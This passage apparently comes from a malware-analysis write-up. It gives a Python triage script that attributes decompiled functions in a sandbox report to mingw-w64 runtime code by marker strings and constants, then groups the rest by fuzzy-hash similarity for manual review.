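    for k, a, s, f, c in _ROWS
]
ENTRY = {e["key"]: e for e in ENTRIES}

# Runtime-library markers. The attribution is the editor's, made from the
# strings and constants visible in the entries; the report names no library.
RUNTIME_MARKERS = [
    # The format string is the default _matherr handler of the mingw-w64 CRT.
    ("mingw-w64 CRT _matherr",
     lambda e: any(s.startswith("_matherr(): %s in %s(") for s in e["strings"])),
    # 0xC0BAB1FD is the LIFE_COND validity magic of mingw-w64 winpthreads; the
    # decompiled bodies return 0x16 (EINVAL) when that check fails, which is
    # the argument check at the top of the pthread_cond_* functions.
    ("mingw-w64 winpthreads pthread_cond_*",
     lambda e: {"0xc0bab1fd", "0x16"} <= e["consts"]),
]


def classify_runtime(entry):
    """Return the runtime-library label for an entry, or None if unattributed."""
    for label, matches in RUNTIME_MARKERS:
        if matches(entry):
            return label
    return None


def nibble_similarity(a, b):
    """Fraction of hex positions at which two Instruction Fuzzy Hashes agree.
    A positional comparison assumed here as a cheap stand-in; it is not
    Joe Sandbox's own similarity metric."""
    a, b = a.lower(), b.lower()
    if not a or len(a) != len(b):
        raise ValueError("fuzzy hashes must be non-empty and of equal length")
    return sum(x == y for x, y in zip(a, b)) / len(a)


def nearest_neighbours(entries):
    """Map each key to (closest other key, similarity)."""
    out = {}
    for e in entries:
        best = max((o for o in entries if o is not e),
                   key=lambda o: nibble_similarity(e["fuzzy"], o["fuzzy"]))
        out[e["key"]] = (best["key"], nibble_similarity(e["fuzzy"], best["fuzzy"]))
    return out


def triage(entries):
    """Split entries into attributed runtime code and functions still to review."""
    labels = {e["key"]: classify_runtime(e) for e in entries}
    return {
        "runtime": {k: v for k, v in labels.items() if v is not None},
        "unattributed": sorted(k for k, v in labels.items() if v is None),
        "nearest": nearest_neighbours(entries),
    }


if __name__ == "__main__":
    result = triage(ENTRIES)
    for key, label in result["runtime"].items():
        print(f"{key:24} runtime: {label}")
    print("still to review:", ", ".join(result["unattributed"]))
    for key, (other, sim) in result["nearest"].items():
        print(f"{key:24} closest {other:24} ({sim:.3f})")
```

Run as a script it leaves only E00007FF67FF6935E01E0 and E00007FF67FF6935D8C40 for manual review; the `_matherr` stubs differ from each other in a handful of nibbles, while the two `pthread_cond_*` siblings sit at roughly 0.7 and everything else is far below, which is the kind of grouping worth doing before reading any of the decompiled bodies.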